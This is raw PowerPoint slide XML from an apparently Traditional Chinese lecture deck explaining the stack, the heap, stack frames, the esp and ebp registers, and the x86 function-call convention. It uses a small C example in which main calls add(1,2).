        <p:spPr>
          <a:xfrm>
            <a:off x="4059779" y="1216205"/>
            <a:ext cx="6530433" cy="4219395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="正方形/長方形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4056ADC6-68B2-B340-B40D-DE53FBC3FFE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4580187" y="1422400"/>
            <a:ext cx="2845080" cy="3006195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rgbClr val="F03B5E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="正方形/長方形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C1D0151-3DCE-E447-880F-B4692E0500A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2664832" y="5503945"/>
            <a:ext cx="12292199" cy="796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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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、一層一層呼叫</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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8" name="下矢印 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2ABF376-5E69-344A-BBC9-FBD13954777B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13850131">
            <a:off x="3273384" y="3589084"/>
            <a:ext cx="1063872" cy="1681437"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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3220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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3323328-FE8C-F642-9F87-F4A26FCE9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639" y="633547"/>
            <a:ext cx="3144414" cy="4590386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82" name="圖片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66DDB46F-3EC0-3C43-AD9C-AC47D6BED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854"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4195578" y="893342"/>
            <a:ext cx="6394634" cy="5148028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="正方形/長方形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D1B152C-A6E6-A849-BB39-7DFBE370858C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4717368" y="1407133"/>
            <a:ext cx="2868766" cy="796062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rgbClr val="F03B5E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="正方形/長方形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35DFCD2-DC4D-8C41-B2E3-16E438200396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7214435" y="3467356"/>
            <a:ext cx="454558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Ｈ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4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eap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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r>
              <a:rPr lang="zh-CN" altLang="en-US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非資料結構</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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r>
              <a:rPr lang="zh-CN" altLang="en-US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動態記憶體位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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97" name="下矢印 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C93137-E67B-444B-87AE-48BCCB778D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6756827">
            <a:off x="7700349" y="1732348"/>
            <a:ext cx="1063872" cy="1051087"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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9687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正方形/長方形 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319967" y="2540870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中かっこ 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5221642" y="5517161"/>
            <a:ext cx="1460775" cy="828204"/>
          </a:xfrm>
          <a:prstGeom prst="bracePair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4405315" y="5429523"/>
            <a:ext cx="1908267" cy="10458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Main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4" name="中かっこ 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5221642" y="4477116"/>
            <a:ext cx="1460775" cy="828204"/>
          </a:xfrm>
          <a:prstGeom prst="bracePair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4405315" y="4431088"/>
            <a:ext cx="1908267" cy="9441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Function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4531782" y="2433895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6818171" y="4617247"/>
            <a:ext cx="346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Function Stack Frame</a:t>
            </a:r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6818171" y="5642637"/>
            <a:ext cx="346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Main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Stack Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="正方形/長方形 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921636" y="5022819"/>
            <a:ext cx="2018713" cy="920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1828619" y="5043690"/>
            <a:ext cx="21375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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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85" name="正方形/長方形 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921637" y="3887655"/>
            <a:ext cx="2018713" cy="920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1881779" y="3902785"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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87" name="直線コネクタ 86"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3863154" y="4472059"/>
            <a:ext cx="620295" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="571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/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3825830" y="5394028"/>
            <a:ext cx="718627" cy="2121"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="571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1125817" y="795721"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="440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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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1577B82-805C-204D-8AB0-7B6C337CDA40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143281" y="1754142"/>
            <a:ext cx="5841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Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>每一隻程式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>(function)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>有自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400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6230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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880553" y="2223790"/>
            <a:ext cx="3076322" cy="2751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1880553" y="1771479"/>
            <a:ext cx="3076322" cy="4523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Example 1 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755005" y="1125144"/>
            <a:ext cx="6987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■</a:t>
            </a:r>
            <a:r>
              <a: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假設今天呼叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP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１</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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, 2, 3);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945321" y="2311571"/>
            <a:ext cx="34687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>
                <a:latin typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>push 0x3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
                <a:latin typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>push 0x2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
                <a:latin typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>push 0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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call function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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add  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F2267D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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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, 0xc</a:t>
            </a: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827737" y="5257379"/>
            <a:ext cx="6987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・</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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被 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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進</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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altLang="ja-JP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stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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是 從右到左</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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ja-JP" altLang="en-US" sz="280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・呼叫副程式者清理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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5564661" y="2089975"/>
            <a:ext cx="2078966" cy="230037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964911" y="4109233"/>
            <a:ext cx="3393057" cy="750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650011" y="3894063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３</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="正方形/長方形 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5650010" y="3426607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２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1" name="正方形/長方形 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5650010" y="2957002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1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5954258" y="2450359"/>
            <a:ext cx="1665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664167" y="404719"/>
            <a:ext cx="9341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Function Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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altLang="zh-TW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(stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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傳參</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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2" name="正方形/長方形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40103686-C7D6-FB4C-BC21-07DF15715F70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7428554" y="4447077"/>
            <a:ext cx="47634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回到原本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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altLang="zh-TW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Frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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因為是往低記憶體</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="36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r>
              <a:rPr lang="zh-CN" altLang="en-US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所以是「加」</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="36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3" name="下矢印 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAC8E7B-0BF7-664D-B67A-7FBE4931A2D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5579188">
            <a:off x="5951957" y="3683121"/>
            <a:ext cx="318162" cy="2300296"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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4" name="正方形/長方形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40A89861-A808-9547-BB2F-A3EF2F52DB19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880554" y="4345936"/>
            <a:ext cx="2962380" cy="607961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rgbClr val="F03B5E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="下矢印 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01860EAD-4F7B-2A48-93B2-FD3642AD70AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="15925404">
            <a:off x="6226150" y="4794795"/>
            <a:ext cx="318162" cy="2300296"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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8851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B3C583-45D9-7444-81D2-8E684EB54C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GCC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DC4A50-0F11-DF44-AE0C-51A246933E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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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999809" y="2026623"/>
            <a:ext cx="4411500" cy="21743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285408" y="2538875"/>
            <a:ext cx="3868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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 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add(1,2);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 return 0;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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="正方形/長方形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987912" y="2307692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1999810" y="2026623"/>
            <a:ext cx="441150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Caller Function</a:t>
            </a:r>
            <a:endParaRPr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1999809" y="4264065"/>
            <a:ext cx="4411500" cy="24756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1999810" y="4268133"/>
            <a:ext cx="4425753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Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr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Function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2128268" y="4925566"/>
            <a:ext cx="3868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void add(</a:t>
            </a:r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n1, </a:t>
            </a:r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n2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r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sum;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 sum = n1 + n2;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}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678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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8787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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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999809" y="2026623"/>
            <a:ext cx="4411500" cy="21743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285408" y="2538875"/>
            <a:ext cx="3868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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0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add(1,2);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 return 0;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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="正方形/長方形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987912" y="2307692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1999810" y="2026623"/>
            <a:ext cx="441150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Caller Function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1999809" y="4264065"/>
            <a:ext cx="4411500" cy="24756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1999810" y="4268133"/>
            <a:ext cx="4425753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Callee</a:t>
            </a:r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Function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2128268" y="4925566"/>
            <a:ext cx="3868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void add(</a:t>
            </a:r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n1, </a:t>
            </a:r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n2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r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sum;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 sum = n1 + n2;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}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678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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32803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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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999809" y="2026623"/>
            <a:ext cx="4411500" cy="21743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285408" y="2538875"/>
            <a:ext cx="3868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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0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add(1,2);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 return 0;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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="正方形/長方形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987912" y="2307692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1999810" y="2026623"/>
            <a:ext cx="441150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Caller Function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1999809" y="4264065"/>
            <a:ext cx="4411500" cy="24756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1999810" y="4268133"/>
            <a:ext cx="4425753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Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr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Function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2128268" y="4925566"/>
            <a:ext cx="3868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void add(</a:t>
            </a:r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n1, </a:t>
            </a:r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n2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r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sum;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 sum = n1 + n2;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}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7861444" y="5867612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２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3" name="直線矢印コネクタ 2"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786753" y="3177153"/>
            <a:ext cx="4074690" cy="290665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1678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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3910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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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999809" y="2026623"/>
            <a:ext cx="4411500" cy="21743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285408" y="2538875"/>
            <a:ext cx="3868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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0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add(1,2);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 return 0;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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="正方形/長方形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987912" y="2307692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1999810" y="2026623"/>
            <a:ext cx="441150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Caller Function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1999809" y="4264065"/>
            <a:ext cx="4411500" cy="24756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1999810" y="4268133"/>
            <a:ext cx="4425753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Callee</a:t>
            </a:r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Function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2128268" y="4925566"/>
            <a:ext cx="3868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void add(</a:t>
            </a:r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n1, </a:t>
            </a:r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n2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r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sum;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 sum = n1 + n2;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}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7861444" y="5867612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２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7861443" y="5386296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1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3500035" y="3323705"/>
            <a:ext cx="4577063" cy="242847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1678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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6758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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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999809" y="2026623"/>
            <a:ext cx="4411500" cy="21743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285408" y="2538875"/>
            <a:ext cx="3868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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0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add(1,2);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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" u="sng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return 0;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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="正方形/長方形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987912" y="2307692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1999810" y="2026623"/>
            <a:ext cx="441150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Caller Function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1999809" y="4264065"/>
            <a:ext cx="4411500" cy="24756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1999810" y="4268133"/>
            <a:ext cx="4425753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Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr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Function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2128268" y="4925566"/>
            <a:ext cx="3868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void add(</a:t>
            </a:r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n1, </a:t>
            </a:r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n2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r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sum;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 sum = n1 + n2;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}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7861444" y="5867612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２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7861443" y="5386296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1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861442" y="4898101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Return Address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18" name="直線矢印コネクタ 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3894667" y="3601156"/>
            <a:ext cx="3966775" cy="151314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1678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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1261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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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999809" y="2026623"/>
            <a:ext cx="4411500" cy="21743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285408" y="2538875"/>
            <a:ext cx="3868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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 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add(1,2);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 return 0;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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
